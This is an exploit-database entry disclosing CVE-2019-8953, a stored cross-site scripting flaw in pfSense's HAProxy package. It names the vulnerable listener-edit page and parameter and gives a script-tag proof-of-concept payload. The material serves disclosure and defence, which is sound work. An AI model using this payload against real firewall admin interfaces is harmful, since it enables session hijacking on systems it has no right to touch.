Lucene search
Gionathan Reale1337DAY-ID-32351HistoryMar 13, 2019 - 12:00 a.m.
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting Vulnerability
2019-03-1300:00:00
Gionathan Reale
0day.today
42
0.133 Low
EPSS
Percentile
95.0%
Exploit for php platform in category web applications
# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.pfsense.org
# Version: 2.4.4-p1/0.59_14
# Software Link: N/A
# Google Dork: N/A
# CVE:2019-8953
##################################################################################################################################
Introduction pfSenseยฎ software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface.
In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.
HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers.
#################################################################################
Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php
PARAMETER Description
PAYLOAD "><script>alert("test")</script>
# 0day.today [2019-03-14] #Related
prion
prion
Design/Logic Flaw
2019-02-20 16:29:00
cve
cve
CVE-2019-8953
2019-02-20 16:29:00
checkpoint_advisories
checkpoint_advisories
Netgate pfSense Stored Cross-Site Scripting (CVE-2019-8953)
2019-10-24 00:00:00
packetstorm
packetstorm
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) Cross Site Scripting
2019-03-13 00:00:00
osv
osv
CVE-2019-8953
2019-02-20 16:29:00